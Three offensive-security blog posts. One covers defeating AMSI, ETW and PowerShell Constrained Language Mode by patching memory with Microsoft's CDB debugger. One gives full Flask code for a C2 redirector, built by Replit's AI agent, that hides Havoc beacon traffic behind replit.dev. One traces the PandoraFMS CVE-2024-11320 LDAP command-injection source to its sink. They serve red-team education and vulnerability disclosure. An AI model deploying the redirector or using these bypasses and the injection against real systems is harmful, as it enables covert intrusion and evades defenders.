The post One Tool To Rule Them All appeared first on Shells.Systems.

AMSI, CLM and ETW – defeated* with one Microsoft signed tool

Let’s start with AMSI – everyone loves bypassing AMSI!

In recent years, many (not all) antivirus products have begun to rely on Antimalware Scan Interface (AMSI) to detect more advanced malicious activity.

Today, it captures every PowerShell, Jscript, VBScript, VBA or .NET command or script at run-time and passes it to the registered security product for inspection – here I am working with Defender for Endpoint.

Now, in 2025, most decent EDRs will get a bit squirrely when you start poking around in the memory space used by amsi.dll.

Unfortunately, the days are past when a simple PowerShell one-liner was all you needed to be free of the constraints of AMSI.

This bypass sets amsiInitFailed to a Boolean True so that the initialization fails resulting in no scans at all being performed for the current process.

(BTW – The above image is from https://s3cur3th1ssh1t.github.io/Bypass_AMSI_by_manual_modification/ – definitely check out this and the author’s other work.)

However, all is not lost. There have been some great bypasses found recently that don’t rely on needing to have RW on amsi.dll such as this awesome piece of research by Vixx : AMSI Write Raid Bypass Vulnerability | OffSec which has spawned quite a few ‘related’ bypasses.

The functions responsible for checking for malicious content are AmsiScanBuffer() and AmsiScanString(). AmsiScanString() is a small function which uses AmsiScanBuffer() underneath. So, if we can bypass the checks performed by AmsiScanBuffer(), we can also bypass AmsiScanString(). The majority of bypasses patch the function, through various means, to always return 0x80070057. 0x80070057 is an HRESULT return code for E_INVALIDARG. The actual scan result for this is 0 — often interpreted as AMSI_RESULT_CLEAN.
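To make the return value above a little less magic, here is a minimal Python sketch that splits a 32-bit HRESULT into its standard fields. The function name `decode_hresult` is my own, purely for illustration; the bit layout (severity in bit 31, facility in bits 16-26, code in the low 16 bits) is the documented HRESULT format.

```python
def decode_hresult(hr: int) -> dict:
    """Split a 32-bit HRESULT into severity, facility and code fields."""
    hr &= 0xFFFFFFFF
    return {
        "failed": bool(hr >> 31),        # bit 31: severity (1 = failure)
        "facility": (hr >> 16) & 0x7FF,  # bits 16-26: facility
        "code": hr & 0xFFFF,             # bits 0-15: error code
    }


fields = decode_hresult(0x80070057)
print(fields)
```

For 0x80070057 this gives a failure with facility 7 (FACILITY_WIN32) and code 0x57 (87, ERROR_INVALID_PARAMETER), which is exactly what E_INVALIDARG wraps.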

Initially, a lot of the signature-based checks were bypassed by fiddling with the actual result value: instead of loading the 0x80070057 value immediately, it was built up through various means (XOR, ADD, SUB etc.) until EAX ultimately contained the correct value, and execution then carried on.

And the eternal cat and mouse game continued to defeat signature-based detections.

But what if we look at the method rather than the exact execution – all we need to do is somehow force the return of a value from a call – either by altering the actual routine in amsi.dll or redirecting that call to a routine of our own. Ideally without having a million hoops to jump through.

Enter CDB/NTSD

Microsoft provides these two console-based debuggers (meaning they are signed by Microsoft) as part of the Windows 10 debugging tools. CDB and NTSD are identical in every way, except that NTSD spawns a new text window when it is started, whereas CDB inherits the Command Prompt window from which it was invoked. For now, I’m using CDB.

One of the huge benefits of CDB is that you can script it. This means that you can take a file, feed it into your console debugger and script actions to take place (breakpoints, dumps, assembly etc.), with no interaction.

What do we need to accomplish –

- Load PowerShell

- Set a BP on AmsiScanBuffer

- Wait until that BP is hit

- Manipulate the data at that address

- Remove the BP

- Continue execution

Seems pretty easy. How do we do this with a CDB script file?

Hopefully the comments next to the commands make sense – please note that the actual file does not have comments and gaps (bar the blank line to exit assembly). It actually looks like

Now we can save this as bypass.txt and execute CDB with the -cf flag which will pass it a script.

"C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe" -cf bypass.txt "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

Happy days

What else can we do with this?

We have control over the Powershell.exe prior to loading any modules, before it starts initialising its environment. In theory, it would be possible to set a BP on load of System.Management.Automation.dll and then do some memory manipulation. It would be a case of identifying the correct memory area for System.Management.Automation.Security.SystemPolicy.GetSystemLockdownPolicy() (for example) and manipulating that to always return SystemEnforcementMode.None.

That is less scriptable (IMHO) due to the lack of CDB support for variables, i.e. you can’t search a range, capture the result and reuse it. Something like $var = s 0x00400000 0x0040FFFF 90 90 90 90, with the result then passed to e $var 00 00 00 00 to zero the NOPs we just searched for, is not possible.

Let’s try manually and have a look at the PowerShell code

But this only goes to check if the SystemPolicy.systemLockdownPolicy hasn’t been initialised yet, or if there was a debugging override which then checks for the presence of WDAC/Applocker policies here

Plenty of opportunities here to force a return of SystemPolicy.systemLockdownPolicy.None: it is just a question of returning 0 from the GetLockDownPolicy. Every time this function is called, it is only because the current lockdown policy != none. So we would want it to look a little something along the lines of

What does this look like to actually try? Well first we need to find the file offset in the DLL to figure out where we are patching. For the version I am working with it is here :

Looks like we need to start overwriting at 0x000D8344. What do we need to overwrite with? Well, it needs to be CIL (Common Intermediate Language), also known as MSIL (Microsoft Intermediate Language): the low-level, stack-based instruction set used in .NET assemblies before JIT compilation. So we need to use the correct instructions prior to the CLR compilation. That looks like:

ldc.i4.0

ret

This will always return an Int with the value of zero. In raw bytes this is:

0x16 0x2A
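As a quick sanity check on those two bytes, here is a small Python sketch that maps a few single-byte CIL opcodes back to their mnemonics. The table and the `disassemble` helper are my own illustration, not part of any tooling used in this post; the opcode values are the ones defined in ECMA-335. It only understands operand-less, single-byte opcodes, so it is not a general CIL disassembler.

```python
# Single-byte, operand-less CIL opcodes relevant here (values from ECMA-335).
CIL_OPCODES = {
    0x16: "ldc.i4.0",  # push the int32 constant 0
    0x17: "ldc.i4.1",  # push the int32 constant 1
    0x18: "ldc.i4.2",  # push the int32 constant 2
    0x2A: "ret",       # return, using the value on top of the stack
}


def disassemble(raw: bytes) -> list:
    """Translate each byte to a mnemonic; unknown bytes are flagged, not guessed."""
    return [CIL_OPCODES.get(b, "<unknown 0x%02X>" % b) for b in raw]


print(disassemble(bytes([0x16, 0x2A])))
```

The two bytes decode to ldc.i4.0 followed by ret, i.e. "push 0, return it", which matches the instructions listed above.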

Let’s patch this manually for now and see what happens. Fire up your preferred hex editor, navigate to 0xD8344 and drop those in.

Let’s reanalyse the file

Can we do this using scripts in CDB? Not as far as I can tell due to the lack of variables.

However, in CDB, you can issue a .loadby sos clr command. Loading sos.dll with .loadby sos clr gives you access to .NET-specific debugging commands in CDB, like inspecting managed objects, call stacks, and JIT-compiled methods. It ties into the right CLR version automatically.

Using this, let’s see if we can manipulate the return value of GetSystemLockdownPolicy

I start PowerShell and run the following commands to check the current status. I wasn’t testing this in a restricted environment, so let’s see if we can enforce a policy rather than bypass it.

None is as expected. Let’s patch it to always return 2 and thus enforced.

After connecting to the PID with CDB we run the following commands

!name2ee allows us to retrieve the details for the bit we are interested in (System.Management.Automation.Security.SystemPolicy)

From there we can take the MethodTable and dump the contents

We can see that in the results you have

079c3088 079a16cc JIT System.Management.Automation.Security.SystemPolicy.GetSystemLockdownPolicy()

We have the start address for the function we are looking at. If we assemble at that address to always return 2 (for Enforce) then we should be able to see if our technique is viable. Note that this time, since it has been compiled, we can overwrite it with the usual assembly code rather than CIL.

A quick check for sanity’s sake to ensure that everything has taken

And let’s see what the result is for a call to that function now

Now let’s try from the very beginning rather than attaching to a PID and see if we can fool it into ConstrainedLanguage mode. This involves patching the appropriate methods with the raw bytes to always return Enforced prior to them being compiled. I have to admit, this all feels a little strange trying to enforce a lockdown!

Success, and given the fact that you are running a Microsoft signed binary, default SRP/Applocker/WDAC/whatever_MS_is_calling_it_this_month rules shouldn’t be a problem.

With some tweaking, this method could be used for multiple bypasses – including disabling ETW (kind of – I’m not looking at kernel patching for EtwTraceKernelEvent etc)

Blindly copying the example above won’t work (read image comments!) – but doing this correctly does work. I can trigger an entry into the event log with an ID of 4103 (executing pipeline) when using Add-Type from the console which results in an entry in the Event Log like this

Open our prepped and patched PowerShell instance with ETW patched out (hint : you’ll need more than just EtwEventWrite patching) and let’s try the same thing :

This now results in …

Conclusion

Image hardening is your friend – remove unwanted and unnecessary tooling from your hosts and help avoid these issues. If your organisation is sufficiently mature, look at whitelisting for applications, at least for the vast majority of the estate (there will always be outliers like Security Testing … wait what?)

ETW and AMSI can be combined into one script – for CLM though, there was a little bit more manual intervention than I had hoped, but being able to change language mode, disable ETW and AMSI all from one MS Signed binary seems like a win to me.

*Have fun, play nice and remember, even if you don’t see an alert, it doesn’t mean you’re not being seen – there are many ways to detect this behaviour.


The post Watch Your AI! Using Replit AI to Mask Your C2 Traffic appeared first on Shells.Systems.

When you’re running any sort of offensive operation, managing your C2 traffic and hiding it with modern technologies is always important. It’s not just a “nice-to-have”; it’s something you want to take care of while putting together your attack infrastructure.

While reading through some of the latest AI buzz, I came across a platform called Replit. It caught my eye because it lets you spin up full web apps using AI. After playing around with it for a bit, I’ve got to say, it’s a good one. The whole workflow feels smooth, and the AI support takes a lot of the grunt work out of building stuff quickly.

With Replit, spinning up a web app is really simple. You tell the agent what you want, and it’ll not only write the code for you, but also handle the deployment, automatically pushing it to a random (or custom) replit.dev subdomain. It’s kind of wild how quick and easy the whole process is, especially for quick prototypes or proof-of-concept builds.

Before we start

This blog post is intended strictly for educational purposes only. The content shared here is meant to help security professionals, researchers, and enthusiasts understand offensive techniques in order to better defend against them. I do not encourage, condone, or take any responsibility for illegal use or abuse of the information presented. Use responsibly and within the boundaries of the law.

Also, just to be clear, the AI part in this post isn’t some fancy buzzword thrown in for attention. We actually used it to build useful stuff.

The first idea that popped into my head was to throw together a simple redirector, something lightweight that could sit on a replit.dev subdomain and quietly handle my C2 traffic. The goal was to have it forward requests straight to my actual teamserver, or maybe chain it through another redirector sitting in front. Nothing fancy, just a quick way to blend in and add another layer to the infrastructure.

When you spin up an app on Replit, it gets deployed to a replit.dev subdomain by default. It looks something like this:

https[://]aaaaaaaa-2222-b33f-b33f--11-133713371337ee.ReplitSubDomain.replit.dev

If you’re on a paid plan, though, you can remove the random naming and go with something cleaner like:

https[://]LegitApp.replit.dev

That subdomain serves whatever your app’s code does, running directly on Replit’s infrastructure. And the best part? Once it’s deployed, you can dive into the generated code and tweak it however you like.

Routing your C2 traffic through these replit.dev domains can be a nice way to blend in. Since Replit is a legit, widely-used platform, especially in dev and business environments, your traffic gets some free camouflage.

And if you take the extra step to make your beacon communication mimic a real service (think API calls or update checks), it becomes way harder for blue teamers to flag it as suspicious at first glance.

Like I mentioned earlier, building the app is super straightforward. You just tell the AI agent what you want your app to do, and it’ll come back with a suggested work plan. Once you give it the green light, it jumps straight into building the app for you.

So to wrap this up, we will tell the agent to create a Flask web app that we will tweak a bit to redirect our traffic from the beacon to the C2 using this app.

Instructing the agent to build a simple app for example will be something like this:

Then the agent will start working on building the application and provide you with a plan and ask you for some extra features you may want to implement.

We will approve this without adding anything and just start.

At this point, you’ll see the agent kick off the build process by generating a main.py file. Give it a few minutes, and it’ll wrap everything up and hand you a working app complete with a live preview.

On the right side we can see the preview of our app, and above it the .replit.dev address. If we expand it, we get the full app URL, which is:

Now if you open up that URL, you’ll see the app live and ready to go, just like that. It’s fully deployed and good to use in public.

Now that we’ve got a handle on how Replit works under the hood, it’s time to get our hands dirty. We’re gonna build a simple redirector using Flask, just enough to catch incoming C2 HTTP traffic and forward those GET and POST requests to our actual teamserver.



For this setup, I will use Havoc C2 as my C2, and I will configure the beacon to send its POST requests to the /api/stats/traffic URI. Keeping it specific like this helps in shaping the traffic. It makes it easier to build a redirector that forwards only the relevant requests to the teamserver while ignoring anything else that might hit the endpoint, more on that later on.

Our Havoc C2 listener will be initially set up with the following configuration:

This listener is set to listen on port 8080 from the teamserver side, using https://tochangethis.replit.dev as the primary host for communication. As for the endpoint, we will be using /api/stats/traffic as the main path our beacon will interact with.

We will change the hostname tochangethis.replit.dev to be the hostname of the app deployed by Replit.

Alright, time to build. We will start by giving the AI agent a clear prompt. We want a Flask app that handles both GET and POST requests, specifically targeting the /api/stats/traffic route. The app should forward anything hitting that route directly to our C2 teamserver listener.

On top of that, we’ll tweak a couple of settings, disable caching to avoid any cached response to the agent, and enable request logging so we can easily debug incoming traffic and confirm everything’s flowing the way we want.

So basically our instruction will be this:

Develop a Flask web application that proxies all GET and POST requests to the /api/stats/traffic endpoint by forwarding them to https://original_host.com, logging each request and its response, and returning the response to the client with caching disabled. Additionally, the app should serve a static landing page at the root path (/) displaying a “Coming Soon” message along with a newsletter subscription form.

Replit AI Agent Instructions

After a few minutes, the agent will finish writing the application and deploying it as follows:

Nice, looks like the application has been successfully deployed. We can see the main page loading without issues, and as expected, it’s live on a .replit.dev subdomain, which is clearly displayed in the green navbar at the top. Clean and ready to roll.

Let’s quickly take a look at the generated Python code from the Files manager:

The full code generated by Replit AI Agent is:

import os
import logging
import requests
from flask import Flask, request, jsonify, render_template, redirect, url_for, flash, Response
from urllib.parse import urljoin
import json

# Configure logging
logging.basicConfig(
    level=logging.DEBUG,
    format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
logger = logging.getLogger(__name__)

# Initialize Flask app
app = Flask(__name__)
app.secret_key = os.environ.get("SESSION_SECRET",
                                "default-secret-key-for-development")

# Target API host
TARGET_HOST = "https://****.live:8080"


@app.route('/')
def index():
    """Serve the coming soon landing page."""
    from datetime import datetime
    current_year = datetime.now().year
    return render_template('index.html', current_year=current_year)


@app.route('/subscribe', methods=['POST'])
def subscribe():
    """Handle newsletter subscription."""
    email = request.form.get('email')
    if not email:
        flash('Email is required!', 'danger')
        return redirect(url_for('index'))

    # Here you would typically save the email to a database or send it to a mailing service
    # For now, we'll just log it
    logger.info(f"Newsletter subscription: {email}")
    flash('Thank you for subscribing!', 'success')
    return redirect(url_for('index'))


@app.route('/api/stats/traffic', methods=['GET', 'POST'])
def proxy_traffic_stats():
    """Proxy requests to the original host's traffic stats endpoint."""
    method = request.method
    target_url = urljoin(TARGET_HOST, "/api/stats/traffic")

    # Log the incoming request
    logger.debug(f"Incoming request: {method} {request.url}")
    logger.debug(f"Request headers: {request.headers}")
    if method == 'POST':
        logger.debug(f"Request data: {request.get_data()}")

    # Prepare headers to forward
    headers = {
        key: value
        for key, value in request.headers.items()
        if key.lower() not in ['host', 'content-length']
    }

    try:
        # Forward the request to the target host
        if method == 'GET':
            response = requests.get(target_url,
                                    headers=headers,
                                    params=request.args,
                                    timeout=10,
                                    verify=False)
        elif method == 'POST':
            response = requests.post(target_url,
                                     headers=headers,
                                     data=request.get_data(),
                                     timeout=10,
                                     verify=False)
        else:
            return jsonify({"error": "Method not allowed"}), 405

        # Log the response
        logger.debug(f"Response status: {response.status_code}")
        logger.debug(f"Response headers: {response.headers}")
        logger.debug(f"Response content: {response.content}")

        # Prepare the response to send back to the client
        excluded_headers = [
            'content-encoding', 'content-length', 'transfer-encoding',
            'connection'
        ]
        headers = [(name, value)
                   for name, value in response.raw.headers.items()
                   if name.lower() not in excluded_headers]

        # Add no-cache headers
        no_cache_headers = [('Cache-Control',
                             'no-store, no-cache, must-revalidate, max-age=0'),
                            ('Pragma', 'no-cache'), ('Expires', '0')]
        headers.extend(no_cache_headers)

        # Return the response
        return Response(response.content, response.status_code, headers)

    except requests.RequestException as e:
        logger.error(f"Proxy error: {str(e)}")
        return jsonify({
            "error": "Failed to forward request",
            "details": str(e)
        }), 502


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=5000, debug=True)

The code does exactly what we asked for: it proxies traffic to our original C2 endpoint at https://****.live:8080/api/stats/traffic using the requests library while still serving the rest of the application cleanly.

The /api/stats/traffic route handles both GET and POST requests, forwarding them with all necessary headers and payloads, and returns the exact response back to the client.

On top of that, it’s wrapped with solid logging for both request and response data, and disables caching with the right headers—perfect for debugging C2 communication without leaving traces in the browser or any intermediate caching layers. The rest of the app (like the landing page and newsletter handler) stays functional and helps the redirector blend in as a normal web service.
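The response-header handling is the part of the generated code that is easiest to get wrong, so here it is pulled out as a standalone sketch. The names `EXCLUDED_HEADERS`, `NO_CACHE_HEADERS` and `build_client_headers` are mine, not from the generated app. The reason for dropping these particular headers, as far as I can tell, is that requests has already decoded the body by the time we read response.content, so the upstream Content-Encoding and Content-Length no longer describe what we send back.

```python
# Headers that no longer describe the body once the proxy has read and decoded it.
EXCLUDED_HEADERS = {
    "content-encoding", "content-length", "transfer-encoding", "connection",
}

# Headers appended to every proxied response to disable caching.
NO_CACHE_HEADERS = [
    ("Cache-Control", "no-store, no-cache, must-revalidate, max-age=0"),
    ("Pragma", "no-cache"),
    ("Expires", "0"),
]


def build_client_headers(upstream_headers):
    """Filter (name, value) pairs from upstream and append the no-cache set."""
    kept = [
        (name, value)
        for name, value in upstream_headers
        if name.lower() not in EXCLUDED_HEADERS
    ]
    return kept + NO_CACHE_HEADERS


example = build_client_headers([
    ("Content-Type", "application/json"),
    ("Content-Length", "12"),
    ("Connection", "keep-alive"),
])
print(example)
```

Only Content-Type survives from the upstream set in this example, followed by the three no-cache headers.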

This code can definitely be customized depending on how your C2 handles traffic and what its communication patterns look like. In other C2 frameworks like Cobalt Strike or Nighthawk, you have tighter control over specific parts of the request and response body.

In our case, since this is just a proof of concept of the technique, we’re keeping it simple and using this technique to forward traffic as-is. But the base is flexible enough to adapt however you need.

You can customize the pages, tweak the theme, or even adjust the code logic depending on what you’re aiming for, but for now, we’ll roll with this setup. It’s already solid enough for our needs and gets the job done without overcomplicating things.

And just like we mentioned earlier, you can grab the full hostname where the code was deployed straight from the green navbar at the top of the page. In our case, this is the new hostname we will be using in our beacon.

And if we browse the hostname, we will get this nice landing page:

Now we will reconfigure our Havoc C2 listener with the new hostname as follows:





Alright, now let’s generate a payload and put everything to the test. I’m going to set up the beacon to connect through my Burp proxy so I can intercept the traffic and observe how the communication flows step by step.

I will copy the generated payload replit-beacon.exe to my Windows 10 machine and execute it while intercepting the connection:

Great, we can see the request hitting the correct host and the exact path we set up. Let’s go ahead and forward it, turn off interception in Burp, and then switch over to our Havoc C2 client to see if the beacon checks in.

Awesome, we’ve got a callback! The beacon successfully reached the teamserver, and we ran the ps command and got the results back. All of that traffic flowed cleanly through the Replit domain, just like we planned. Stealthy, simple, and effective.

Conclusion

Using Replit domains to route your C2 traffic is a solid technique, mainly because these domains are generally trusted and widely used.

You can definitely take things further by tweaking the backend logic or customizing how the frontend is served. On top of that, adding access controls or request validation can tighten things up even more and make your setup harder to fingerprint.

Replit itself is a powerful platform; it builds and deploys code for you, takes care of the infrastructure, and just makes life easier overall. And as I mentioned earlier, this was done strictly for educational and legal purposes only. I’m not responsible for any misuse or illegal activity stemming from this information.


The post PandoraFMS v7.0NG.777.3 Remote Command Execution (CVE-2024-11320) appeared first on Shells.Systems.

Previously, during a quick code review of PandoraFMS, I identified CVE-2019-20224, an RCE vulnerability affecting the product. In this blog post, I’ll delve into another code review of PandoraFMS that uncovered a new RCE vulnerability, now assigned CVE-2024-11320. This post is the first in a two-part series focused on CVE-2024-11320.

In this part, I’ll walk through the manual process of identifying and understanding the bug, while the second part will demonstrate how the same vulnerability can be detected using CodeQL, showcasing its capabilities for automated code analysis.

This analysis, like others I’ve conducted, reflects my personal approach to analyzing vulnerable code and tracing the connections between sources and sinks. It is by no means a comprehensive methodology, and there are certainly more refined approaches you can use to achieve the same goals.

Summary about PandoraFMS

Pandora FMS is a monitoring software for IT infrastructure management. It includes network equipment, Windows and Unix servers, virtual infrastructure, and various applications. Pandora FMS has many features, making it a new-generation software that covers all your organization’s monitoring issues.

About the vulnerability

During the code analysis, I discovered an interesting piece of code in the local_ldap_search function, located in /var/www/html/pandora_console/include/auth/mysql.php.

This function executes a system command during LDAP authentication, which could be defined as a sink we could start with. The relevant code looks as follows:

if (!empty($ldap_admin_user)) {
    $ldap_admin_user = " -D '".$ldap_admin_user."'";
}

if (!empty($ldap_admin_pass)) {
    $ldap_admin_pass = ' -w '.escapeshellarg($ldap_admin_pass);
}

$dn = ' -b '.escapeshellarg($dn);

$ldapsearch_command = 'timeout '.$ldap_search_time.' ldapsearch -LLL -o ldif-wrap=no -o nettimeout='.$ldap_search_time.' -x'.$ldap_host.$ldap_version.' -E pr=10000/noprompt '.$ldap_admin_user.$ldap_admin_pass.$dn.$filter.$tls.' | grep -v "^#\|^$" | sed "s/:\+ /=>/g"';

$shell_ldap_search = explode("\n", shell_exec($ldapsearch_command));

foreach ($shell_ldap_search as $line) {
    $values = explode('=>', $line);
    if (!empty($values[0]) && !empty($values[1])) {
        $user_attr[$values[0]][] = $values[1];
    }
}

We can see that in line #1645 we have a call to the function shell_exec, used to execute the command stored in the variable $ldapsearch_command defined in line #1644.

The variable $ldapsearch_command is built from several other variables; the most important one in our case is $ldap_admin_user, which is defined in line #1636 and is passed to the function local_ldap_search as follows:

function local_ldap_search(
    $ldap_host,
    $ldap_port=389,
    $ldap_version=3,
    $dn=null,
    $access_attr=null,
    $ldap_admin_user=null,
    $ldap_admin_pass=null,
    $user=null,
    $ldap_start_tls=null,
    $ldap_search_time=5
) {

Referring back to the previous code snippet, we observe that the variable $ldap_admin_user is passed to shell_exec as part of $ldapsearch_command. Notably, the value of $ldap_admin_user is only wrapped in single quotes and is used without any sanitization, whereas $ldap_admin_pass and $dn are both passed through escapeshellarg.

In theory, if we can control the value of $ldap_admin_user, we could inject malicious code that would reach the vulnerable sink. To confirm this, we need to trace the source of this variable, analyze how it is set, and verify that it is not sanitized before reaching the vulnerable sink.
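To see why plain single quotes are not enough, here is a small Python sketch that builds the same kind of command string both ways and tokenizes it without ever executing anything. This is an analogy, not PandoraFMS code: `build_unsafe` and `build_safe` are hypothetical helpers, shlex.quote stands in for PHP's escapeshellarg, and the test value uses a harmless echo marker. Note that shlex.split only models shell quoting; the `;` shows up as its own token here because of the surrounding spaces, which is enough to show that the value has escaped its quotes.

```python
import shlex


def build_unsafe(admin_user: str) -> str:
    # Mirrors the PHP concatenation " -D '".$ldap_admin_user."'" (no escaping).
    return "ldapsearch -D '" + admin_user + "'"


def build_safe(admin_user: str) -> str:
    # shlex.quote is used as a Python stand-in for PHP's escapeshellarg().
    return "ldapsearch -D " + shlex.quote(admin_user)


value = "cn=admin' ; echo INJECTED ; '"

# Unquoted concatenation: the value's own quote closes the argument early.
print(shlex.split(build_unsafe(value)))

# Properly quoted: the whole value stays a single argument.
print(shlex.split(build_safe(value)))
```

In the unsafe case the value is split into several tokens, including a bare `;`, while the quoted version keeps it as one argument to -D. That is the difference between the handling of $ldap_admin_user and the other two variables.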

Tracing the source

We will begin by analyzing the calls to the local_ldap_search function to identify its use in the codebase. By searching for this function, we find that it is called only once in the file mysql.php, as shown below:

if ($config['ldap_function'] == 'local') {
    $sr = local_ldap_search(
        $ldap['ldap_server'],
        $ldap['ldap_port'],
        $ldap['ldap_version'],
        io_safe_output($ldap['ldap_base_dn']),
        $ldap['ldap_login_attr'],
        io_safe_output($ldap['ldap_admin_login']),
        io_output_password($ldap['ldap_admin_pass']),
        io_safe_output($login),
        $ldap['ldap_start_tls'],
        $config['ldap_search_timeout']
    );

We can see that it’s called when $config['ldap_function'] is set to local. It then passes io_safe_output($ldap['ldap_admin_login']) as $ldap_admin_user, based on the function definition provided earlier, and saves the execution result in the $sr variable (this part isn’t important, but it’s good to mention it).

This code is part of the function ldap_process_user_login, which is defined in mysql.php as follows:

/**
 * Authenticate against an LDAP server.
 *
 * @param string User login
 * @param string User password (plain text)
 *
 * @return boolean True if the login is correct, false in other case
 */
function ldap_process_user_login($login, $password, $secondary_server=false)
{
    global $config;
    ....

Now we need to understand how the function ldap_process_user_login is called, since it later checks whether $config['ldap_function'] == 'local', passes the execution flow to local_ldap_search, and passes $ldap['ldap_admin_login'] as the variable $ldap_admin_user.

From the function declaration, its calls and the logic behind them, we can conclude that ldap_process_user_login calls local_ldap_search once the authentication method is set to LDAP. It pulls the LDAP auth options from the $ldap array, which is populated from the $config global array that holds these configurations, and is defined as follows:

/**
 * Authenticate against an LDAP server.
 *
 * @param string User login
 * @param string User password (plain text)
 *
 * @return boolean True if the login is correct, false in other case
 */
function ldap_process_user_login($login, $password, $secondary_server=false)
{
    global $config;

    if (! function_exists('ldap_connect')) {
        $config['auth_error'] = __('Your installation of PHP does not support LDAP');
        return false;
    }

    $ldap_tokens = [
        'ldap_server',
        'ldap_port',
        'ldap_version',
        'ldap_base_dn',
        'ldap_login_attr',
        'ldap_admin_login',
        'ldap_admin_pass',
        'ldap_start_tls',
    ];

    foreach ($ldap_tokens as $token) {
        $ldap[$token] = $secondary_server === true ? $config[$token.'_secondary'] : $config[$token];
    }

    // Remove entities ldap admin pass.
    $ldap['ldap_admin_pass'] = io_safe_output($ldap['ldap_admin_pass']);

    // Connect to the LDAP server
    if (stripos($ldap['ldap_server'], 'ldap://') !== false
        || stripos($ldap['ldap_server'], 'ldaps://') !== false
        || stripos($ldap['ldap_server'], 'ldapi://') !== false
    ) {
        $ds = @ldap_connect($ldap['ldap_server'].':'.$ldap['ldap_port']);
    } else {
        $ds = @ldap_connect($ldap['ldap_server'], $ldap['ldap_port']);
    }

    if (!$ds) {
        $config['auth_error'] = 'Error connecting to LDAP server';
        return false;
    }

    // Set the LDAP version.
    ldap_set_option($ds, LDAP_OPT_PROTOCOL_VERSION, $ldap['ldap_version']);
    ldap_set_option($ds, LDAP_OPT_NETWORK_TIMEOUT, 1);

    // Set ldap search timeout.
    ldap_set_option(
        $ds,
        LDAP_OPT_TIMELIMIT,
        (empty($config['ldap_search_timeout']) === true) ? 5 : ((int) $config['ldap_search_timeout'])
    );

    if ($ldap['ldap_start_tls']) {
        if (!@ldap_start_tls($ds)) {
            $config['auth_error'] = 'Could not start TLS for LDAP connection';
            @ldap_close($ds);
            return false;
        }
    }

    if ($config['ldap_function'] == 'local') {
        $sr = local_ldap_search(
            $ldap['ldap_server'],
            $ldap['ldap_port'],
            $ldap['ldap_version'],
            io_safe_output($ldap['ldap_base_dn']),
            $ldap['ldap_login_attr'],
            io_safe_output($ldap['ldap_admin_login']),
            io_output_password($ldap['ldap_admin_pass']),
            io_safe_output($login),
            $ldap['ldap_start_tls'],
            $config['ldap_search_timeout']
        );
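The part of that function that matters for tracing the source is the token loop near the top, which copies values out of the global config. A rough Python equivalent is sketched below; `select_ldap_settings` and the sample config values are hypothetical and only meant to show that whatever is stored under ldap_admin_login (or ldap_admin_login_secondary) ends up in the $ldap array unchanged.

```python
LDAP_TOKENS = [
    "ldap_server", "ldap_port", "ldap_version", "ldap_base_dn",
    "ldap_login_attr", "ldap_admin_login", "ldap_admin_pass", "ldap_start_tls",
]


def select_ldap_settings(config: dict, secondary_server: bool = False) -> dict:
    """Copy each LDAP token from config, using the *_secondary key when asked."""
    suffix = "_secondary" if secondary_server is True else ""
    return {token: config[token + suffix] for token in LDAP_TOKENS}


# Hypothetical config contents, for illustration only.
config = {token: "primary:" + token for token in LDAP_TOKENS}
config.update({token + "_secondary": "secondary:" + token for token in LDAP_TOKENS})

print(select_ldap_settings(config)["ldap_admin_login"])
print(select_ldap_settings(config, secondary_server=True)["ldap_admin_login"])
```

There is no validation in this step, so the question becomes who can write to the config value in the first place.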

Next, we need to identify where the LDAP configuration is defined. This will allow us to examine how it is submitted and determine if and how we can control it.

After further investigation, I discovered that the authentication settings are managed within the setup_auth.php and functions_config.php files. These files are responsible for checking and updating the authentication options used by the PandoraFMS appliance.

PandoraFMS handles requests to setup_auth.php through the page /pandora_console/index.php?sec=general&sec2=godmode/setup/setup&section=auth. This page sends the authentication configuration to the backend via a POST request. The backend processes the request and updates the configuration using the config_update_value and get_parameter functions, as demonstrated in the following code:

if (config_update_value('ldap_admin_login', get_parameter('ldap_admin_login'), true) === false) {
    $error_update[] = __('Admin LDAP login');
}

Here, the config_update_value function updates the ldap_admin_login configuration with the value retrieved by the get_parameter function, which processes the incoming POST request for this page.

The function get_parameter is defined in functions.php as follows:

/**
 * Get a parameter from a request.
 *
 * It checks first on post request, if there were nothing defined, it
 * would return get request
 *
 * @param string $name key of the parameter in the $_POST or $_GET array
 * @param mixed $default default value if the key wasn't found
 *
 * @return mixed Whatever was in that parameter, cleaned however
 */
function get_parameter($name, $default='')
{
    // POST has precedence
    if (isset($_POST[$name])) {
        return get_parameter_post($name, $default);
    }

    if (isset($_GET[$name])) {
        return get_parameter_get($name, $default);
    }

    if (isset($_FILES[$name])) {
        return get_parameter_file($name, $default);
    }

    return $default;
}

The get_parameter function retrieves a parameter from a web request, prioritizing POST data ($_POST) first, followed by GET data ($_GET), and finally uploaded files ($_FILES).

It uses helper functions (get_parameter_post, get_parameter_get, get_parameter_file) to retrieve and clean the parameter from each source.

If the parameter is not found in any of these, it returns a specified default value. This function ensures a consistent way to access request parameters while handling precedence between different request methods and applying some level of input cleaning.
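The lookup order described above can be mimicked in a few lines of Python. This is only a sketch of the precedence logic: the dictionaries are stand-ins for PHP's $_POST, $_GET and $_FILES, the sample values are made up, and the cleaning done by the real helper functions is deliberately left out.

```python
def get_parameter(name, post, get, files, default=""):
    """Return the first match for name, checking POST, then GET, then FILES."""
    # POST has precedence, mirroring the order of the PHP function above.
    for source in (post, get, files):
        if name in source:
            return source[name]
    return default


# Hypothetical request data: the same key is present in both POST and GET.
post = {"ldap_admin_login": "from-post"}
get = {"ldap_admin_login": "from-get", "section": "auth"}

print(get_parameter("ldap_admin_login", post, get, {}))
print(get_parameter("section", post, get, {}))
print(get_parameter("missing", post, get, {}, "n/a"))
```

The point to take away is that a value such as ldap_admin_login is accepted from whichever source supplies it first, so it is fully attacker-controlled once the settings page is reachable.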

Based on the previous code snippet, functions_config.php takes the ldap_admin_login value sent by the page /pandora_console/index.php?sec=general&sec2=godmode/setup/setup&section=auth and saves it as the config value later exposed as $ldap['ldap_admin_login'], without any sanitization.

This means that updating this value will reach our vulnerable sink, local_ldap_search, if authentication is set to local LDAP.

Putting all things together

Let’s try to update the authentication options using the page /pandora_console/index.php?sec=general&sec2=godmode/setup/setup&section=auth, which contains the following form:

Changing the authentication method to LDAP should give us this form:

Fill it with dummy values and make sure they are updated as expected. We can use Burp to intercept the request and double-check the parameter names:

As expected, all the required parameters are passed to the backend with our values, and if we forward the request, we get the following:

